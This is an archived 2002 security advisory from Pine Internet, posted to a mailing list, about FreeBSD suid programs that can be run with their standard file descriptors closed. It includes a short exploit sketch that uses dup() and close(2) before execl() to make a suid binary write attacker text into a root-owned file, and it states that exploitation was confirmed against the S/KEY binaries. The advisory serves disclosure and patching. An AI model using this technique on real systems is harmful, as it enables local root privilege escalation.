OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Patrick Oonk (patrickpine.nl)
Date: Mon Apr 22 2002 - 03:58:25 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----

     -----------------------------------------------------------------------------
     Pine Internet Security Advisory
     -----------------------------------------------------------------------------
     Advisory ID : PINE-CERT-20020401
     Authors : Joost Pol <joostpine.nl>
     Issue date : 2002-04-22
     Application : Multiple
     Version(s) : Multiple
     Platforms : FreeBSD confirmed, maybe others.
     Vendor informed : 20020406
     Availability : http://www.pine.nl/advisories/pine-cert-20020401.txt
     -----------------------------------------------------------------------------

    Synopsis

            It is possible for a local user to execute a suid application with
            stdin, stdout or stderr closed.

    Impact

            HIGH. Local users should be able to gain root privileges.

    Description

            Consider the following (imaginary) suid application:

            -- begin of imaginary code snippet

                    FILE * f = fopen("/etc/root_owned_file", "r+");

                    if(f) {
                    
                            fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);

                            fclose(f);
                    }

            -- end of imaginary code snippet
                    
            Now, consider the following (imaginary) exploit:

            -- begin of imaginary exploit snippet

                    while(dup(1) != -1);

                    close(2);

                    execl("/path/to/suid_application",
                          "this text will endup in the root_owned_file", 0);

            -- end of imaginary exploit snippet

            Exploitation has been confirmed using the S/KEY binaries.

    Solution

            FreeBSD source trees have been updated on the 21th of april 2002.
            Please cvsup.

    -----BEGIN PGP SIGNATURE-----
    Version: 2.6.3ia
    Charset: noconv

    iQEVAwUBPMPQffplhmN+UTQRAQE/bggAwkCUhmkv5QUVVE/pUcHIkN26Txa0Pv6T
    4q4Iu4TKi6YhJYJ5Jlh0YhlgkurVE7/qAokvxEfdgHQTR68uCPJhDQTKp/9uJ+PG
    qt+InMh7NHaOdIvEjcH74D9zxEC14uH+SrXmmmZno601d9mLcBZyKs0ZgOFCBnJr
    QToyEgs709xtnbs5OP8iPxn6dhZADMPM9NJbtU2EvkSUqRoDB8H1awUAANI/8RzJ
    4HOLDkFOkYFaNFvbYMULStGU5nH9OTHtOuTw7decgHBK6h9H8FhYf8Yn2hMq8wf0
    p8/v5m535gPHqoX9HWvfMw2LdIr36mol5K9br9033XrOdIG5itn5aQ==
    =AMED
    -----END PGP SIGNATURE-----

    -- 
     patrick oonk - pine internet - patrickpine.nl - www.pine.nl/~patrick
     T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl 
     PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
     Note: my NEW PGP key is available at http://www.pine.nl/~patrick/
     Excuse of the day: it has Intel Inside